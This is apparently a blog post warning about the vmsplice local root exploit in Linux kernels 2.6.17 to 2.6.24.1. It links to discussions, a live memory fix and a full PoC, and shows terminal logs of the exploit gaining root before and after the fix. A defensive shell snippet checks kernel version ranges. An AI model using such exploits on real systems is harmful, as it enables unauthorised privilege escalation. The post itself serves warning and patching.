Linux Kernel exploit for 2.6.17 up to 2.6.24.1
Today I came across some serious exploits circulating on Full-Disclosure, Bugtraq and even Slashdot.
Better monkey patch your multi-user machines fast, before the script kiddies get a grip on this...
Beware of the live memory fix, as some people have experienced memory faults and system crashes with it.
Update:
For a more in-depth analysis of what has been going on (the why, the what, etc.), there is a nice LWN article here.
- LKML thread about this issue
- Slashdot article
- Debian bug tracker entry about this exploit
- Live memory fix, which inserts a ret at the beginning of vmsplice()
- Full exploit PoC
[0:07][br@gemini:programming/linux/exploits]% ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f9e000 .. 0xb7fd0000
[+] root
bash: 0STY: command not found
root@gemini:~/programming/linux/exploits# whoami
root
root@gemini:~/programming/linux/exploits#
[0:13][br@gemini:programming/linux/exploits]% ./disable_exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fa8000 .. 0xb7fda000
[+] root
Exploit gone!
[0:14][br@gemini:programming/linux/exploits]% ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f7c000 .. 0xb7fae000
[-] vmsplice
[0:14][br@gemini:programming/linux/exploits]% whoami
br
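The first thing an administrator of a multi-user box wants to know is whether the running kernel falls inside the affected range named in the title, 2.6.17 up to and including 2.6.24.1. The following POSIX sh snippet is an added example, not code from the post or from the exploit author: it strips the distribution suffix from a release string such as the output of uname -r, turns the upstream version into a comparable integer, and reports whether it lies in that range. The function names (kernel_key, vmsplice_range_affected, vmsplice_check) are my own. Treat the verdict as a heuristic: distribution kernels backport security fixes without bumping the upstream version, so a hit means "check your vendor's advisory and patch status", not "this host is exploitable".

```shell
#!/bin/sh
# Added example (not from the original post): classify a kernel release
# string against the affected range stated in the post, 2.6.17 .. 2.6.24.1.

# Map "2.6.24-19-generic" -> 2006024000, "2.6.24.1" -> 2006024001.
# Only the leading dotted-digit part is used; distro suffixes are dropped.
kernel_key() {
    base=$(printf '%s' "$1" | sed 's/[^0-9.].*$//')
    oldifs=$IFS
    IFS=.
    set -- $base
    IFS=$oldifs
    a=${1:-0}; b=${2:-0}; c=${3:-0}; d=${4:-0}
    echo $(( ((a * 1000 + b) * 1000 + c) * 1000 + d ))
}

# Returns 0 (true) when the release is inside 2.6.17 .. 2.6.24.1 inclusive,
# 1 otherwise. Pure version check; it does not probe the running kernel.
vmsplice_range_affected() {
    key=$(kernel_key "$1")
    lo=$(kernel_key 2.6.17)
    hi=$(kernel_key 2.6.24.1)
    [ "$key" -ge "$lo" ] && [ "$key" -le "$hi" ]
}

# Human-readable verdict for the given release, or for `uname -r` when
# no argument is passed. Exit status mirrors vmsplice_range_affected.
vmsplice_check() {
    rel=${1:-$(uname -r)}
    if vmsplice_range_affected "$rel"; then
        printf '%s: inside affected range 2.6.17-2.6.24.1; check vendor patch status\n' "$rel"
        return 0
    fi
    printf '%s: outside affected range\n' "$rel"
    return 1
}

# Usage: vmsplice_check            # inspect the running kernel
#        vmsplice_check 2.6.24.1   # inspect a given release string
```

Run it with no argument on each multi-user host, or feed it release strings collected from an inventory; hosts that report "inside affected range" are the ones to verify against your distribution's security updates first.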
Comments
- Hey there, yeah, this exploit is another one being out in the wild for Linux... especially those people with many users (i.e. universities) will have a lot of _fun_ with that bug, as an arbitrary student could get root using that thing. There've been some local user privileges out there, but this one seems rather heavy (as for the account of vmsplice *brr*)... can't wait for that thing to be fixed.